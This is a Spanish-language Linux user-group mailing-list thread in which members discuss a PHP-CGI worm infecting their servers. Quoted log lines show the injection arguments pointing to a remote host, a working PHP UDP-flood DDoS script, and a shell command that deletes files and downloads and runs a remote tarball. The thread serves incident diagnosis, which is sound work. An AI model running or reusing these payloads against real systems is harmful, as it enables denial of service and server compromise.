<div dir="ltr"><div class="gmail_extra"><br><br><div class="gmail_quote">El 4 de diciembre de 2013 10:36, Sacanti Ernesto<span dir="ltr">&lt;<a href="mailto:sacanti.ernesto@gmail.com" target="_blank">sacanti.ernesto@gmail.com</a>&gt;</span> escribió:<br>

<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">El 03/12/13 23:50, Martín Carr escribió:<div class="im"><br>


<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
2013/12/3, E S&lt;<a href="mailto:micta2003@yahoo.com" target="_blank">micta2003@yahoo.com</a>&gt;:<br>
<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
Estimados<br>
<br>
No me queda claro como me puede afectar este gusano. Tengo LinuxMint 15 y<br>
soy un usuario comun. Esas recomendaciones son para redes?<br>
</blockquote>
<br>
Salvo que uses tu computadora como un servidor web (para alojar<br>
páginas dinámicas que usan el lenguaje PHP) y no la hayas actualizado,<br>
no tenés que preocuparte.<br>
<br>
Saludos!<br>
<br>
</blockquote></div>
No se si sera esto, pero encontre en mi servidor este log:<br>
/usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=\&quot;\&quot; -d open_basedir=none -d auto_prepend_file=<a href="http://82.221.102.181/robots.txt" target="_blank">http://82.<u></u>221.102.181/robots.txt</a> -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n<br>


<br></blockquote><div><br></div><div>Si tenes tu equipo infectado, pero por lo que leo sobre el virus para poder acceder tienen que haber coseguido usuario y clave:</div><div><br></div><div><span style="background-color:rgb(249,249,249);color:rgb(51,51,51);font-family:&#39;Source Sans Pro&#39;,&#39;Open Sans&#39;,&#39;Liberation Sans&#39;,Verdana,Helvetica,sans-serif;font-size:18px;font-style:italic;line-height:21px">Una vez ejecutado, el gusano genera aleatoriamente direcciones IP, accesando una ruta específica en la máquina con una ID y contraseña conocida y envía solicitudes HTTP POST, que explotan la vulnerabilidad. Si en el objetivo no ha sido corregida la vulnerabilidad, se descarga el gusano desde un server malicioso y comienza a buscar un nuevo objetivo</span></div>

<div><br></div><div> </div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
Como que esta intentando descargar un archivo robots.txt desde un servidor... al mirar este archivo encontre este codigo: <br></blockquote><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">


&lt;?php<br>
<br>
function ddos($host, $exec_time){<br>
    $packets = 0;<br>
    ignore_user_abort(TRUE);<br>
    set_time_limit(0);<br>
    $out = &#39;&#39;;<br>
    $time = time();<br>
    echo &quot;Started: &quot;.time(&#39;d-m-y h:i:s&#39;).&quot;&lt;br&gt;&quot;;<br>
    $max_time = $time+$exec_time;<br>
<br>
    for($i=0;$i&lt;65000;$i++){<br>
            $out .= &#39;h&#39;;<br>
    }<br>
    while(1){<br>
    $packets++;<br>
            if(time() &gt; $max_time){<br>
                    break;<br>
            }<br>
            $rand = rand(1,65000);<br>
            $fp = fsockopen(&#39;udp://&#39;.$host, $rand, $errno, $errstr, 5);<br>
            if($fp){<br>
                    @fwrite($fp, $out); // $out is the bullshit we&#39;re sending, conn refused errors still send the data<br>
                    fclose($fp);<br>
            }<br>
    }<br>
}<br>
ddos(&quot;199.107.6.164&quot;,&quot;60&quot;);<br>
<br>
No se quien sera el pobre 199.107.6.164 pero me parece que se la tienen jurada....<br></blockquote><div><br></div><div>Ellos tampoco, es una dirección al azar.</div><div><br></div><div>En un copypaste encontré esto:</div>

<div><br></div><div><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">www-data </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">16746</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">     </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">1</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">  </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">0</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)"> </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">17344</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">  </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">6716</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">   </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">3</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)"> </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">11</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">:00 </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(102,204,102)">?</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">        S      </span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(255,69,0)">0</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">:00 /usr/lib/cgi-bin/php -d allow_url_include=on -d safe_mode=off -d suhosin.</span><span style="margin:0px;padding:0px;vertical-align:baseline;color:black;font-family:&#39;Courier New&#39;,courier;font-size:13px">simulation</span><span style="color:rgb(0,0,0);font-family:&#39;Courier New&#39;,courier;font-size:13px;background-color:rgb(255,255,238)">=on -d disable_functions=\</span><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(72,61,139)">&quot;<span style="margin:0px;padding:0px;vertical-align:baseline;color:rgb(0,0,153);font-weight:bold">\&quot;</span> -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n<br style="margin:0px;padding:0px;vertical-align:baseline">

www-data 16748 16746  0   989   628   3 11:00 ?        S      0:00 sh -c crontab -r ; killall -9 perl ; cd /tmp/ ; rm -rf * ; rm -rf .* ; cd /var/tmp/ ; rm -rf .* ; rm -rf * ; wget <a href="http://88.191.144.153/sshd.tar">http://88.191.144.153/sshd.tar</a> ; tar xvf sshd.tar ; tar zxvf sshd.tar ; cd .ssh_auth/.d ; chmod +x * ; ./dns-pool<br style="margin:0px;padding:0px;vertical-align:baseline">

www-data 16762 16748  0  4407  1592   2 11:00 ?        S      0:02 /bin/bash ./dns-pool</span><br></div><div><span style="margin:0px;padding:0px;vertical-align:baseline;font-family:&#39;Courier New&#39;,courier;font-size:13px;color:rgb(72,61,139)"><br>

</span></div><div><br></div><div>Por lo que se vé está corriendo con el usuario www-data, es decir el usuario de apache.</div><div>Quizás tenga que ver con el código del gusano.</div><div><br></div><div>Omar</div><div><br>

</div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
Saludos<span class=""><font color="#888888"><br>
Ernesto</font></span><div class=""><div class="h5"><br>
______________________________<u></u>_________________<br>
Lugro-principiantes mailing list<br>
<a href="mailto:Lugro-principiantes@lugro.org.ar" target="_blank">Lugro-principiantes@lugro.org.<u></u>ar</a><br>
<a href="http://lugro.org.ar/mailman/listinfo/lugro-principiantes" target="_blank">http://lugro.org.ar/mailman/<u></u>listinfo/lugro-principiantes</a><br>
</div></div></blockquote></div><br></div></div>